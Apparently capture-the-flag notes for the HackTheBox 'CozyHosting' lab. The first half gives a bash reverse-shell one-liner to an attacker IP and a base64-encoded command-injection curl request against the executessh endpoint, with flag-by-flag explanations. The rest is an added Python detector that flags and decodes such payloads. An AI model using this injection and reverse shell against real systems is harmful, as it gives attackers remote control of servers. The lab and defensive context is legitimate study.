Reverse shell one-liners

  • bash -c 'bash -i >& /dev/tcp/10.10.14.4/42069 0>&1'
    • wrapping the bash reverse shell in a bash -c allows the reverse shell to persist if the connection drops
  • base64 encoding to avoid errors caused by spaces in the payload.
    • echo -ne "bash -c 'bash -i >& /dev/tcp/10.10.14.4/42069 0>&1'" | base64 -w0
      • bash -c '...' = explicitly spawns a new bash process to run the string
      • -n = no trailing newline (clean base64 output)
      • -e = enable escape sequences (not needed here, but doesn't hurt)
      • -w0 = flag on base64 that disables line wrapping, so the entire base64 string is output on one line (important! line breaks would break the injection)
    • take the output and use it in the request below
  • $ curl http://cozyhosting.htb/executessh --data-urlencode 'host=127.0.0.1' --data-urlencode 'username=admin;echo${IFS}YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzQyMDY5IDA+JjEn=|base64${IFS}-d|bash;#' -v
    • ${IFS} = bash's internal field separator (a space by default), used in place of literal spaces in the injected value
    • -d = flag for base64, meaning decode
      • converts the base64 string back to plaintext
    • bash = executes the decoded string as a bash command (this is what launches your reverse shell)
    • ; = terminates the injected command cleanly
    • # = bash comment; everything after it is ignored. This kills the @127.0.0.1 that the server appends
    • -v = verbose mode, shows request/response headers in your terminal
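The defender's counterpart to the request above, as an added example that is not part of the original notes: a check the executessh endpoint could run on its POST body, combining a strict allow-list for username with decoding of any embedded base64 run so the reverse-shell markers hidden in it surface. The endpoint, parameter names and the base64 blob come from the notes; the allow-list pattern and the marker list are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Constructed sample bodies, built the way curl --data-urlencode sends them.
# BLOB is the base64 string from the notes above (stray trailing '=' included).
BLOB = "YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzQyMDY5IDA+JjEn="
INJECTED_BODY = urlencode({"host": "127.0.0.1",
                           "username": "admin;echo${IFS}" + BLOB + "|base64${IFS}-d|bash;#"})
BENIGN_BODY = urlencode({"host": "127.0.0.1", "username": "admin"})

# Assumed allow-list: the server interpolates username into `ssh <user>@<host>`,
# so nothing outside a plain POSIX-style account name belongs in it.
VALID_USERNAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
# Shell metacharacters plus the space substitute the notes rely on (${IFS}).
SHELL_BREAKOUT = re.compile(r"[;|&`\n]|\$\{IFS\}|\$\(")
# Long base64-looking runs are worth decoding; short ones are ordinary words.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
DECODED_IOC = re.compile(r"/dev/tcp/|bash -i|bash -c")


def decode_tokens(value):
    """Yield the plaintext of every base64-looking token; padding is recomputed."""
    for tok in B64_TOKEN.findall(value):
        raw = tok.rstrip("=")
        raw += "=" * (-len(raw) % 4)   # invalid lengths fail in b64decode below
        try:
            yield base64.b64decode(raw, validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue


def inspect_body(body):
    """Return findings for one executessh POST body; an empty list means clean."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if name == "username" and not VALID_USERNAME.match(value):
                findings.append(f"{name}: rejected by allow-list")
            if SHELL_BREAKOUT.search(value):
                findings.append(f"{name}: shell metacharacter or ${{IFS}} present")
            for plain in decode_tokens(value):
                if DECODED_IOC.search(plain):
                    findings.append(f"{name}: base64 decodes to {plain[:40]!r}")
    return findings


if __name__ == "__main__":
    for label, body in (("injected", INJECTED_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_body(body) or ["clean"])
```

Rejecting on the allow-list alone is the fix; the decoding pass is what turns the same request into a useful alert rather than a silent 400.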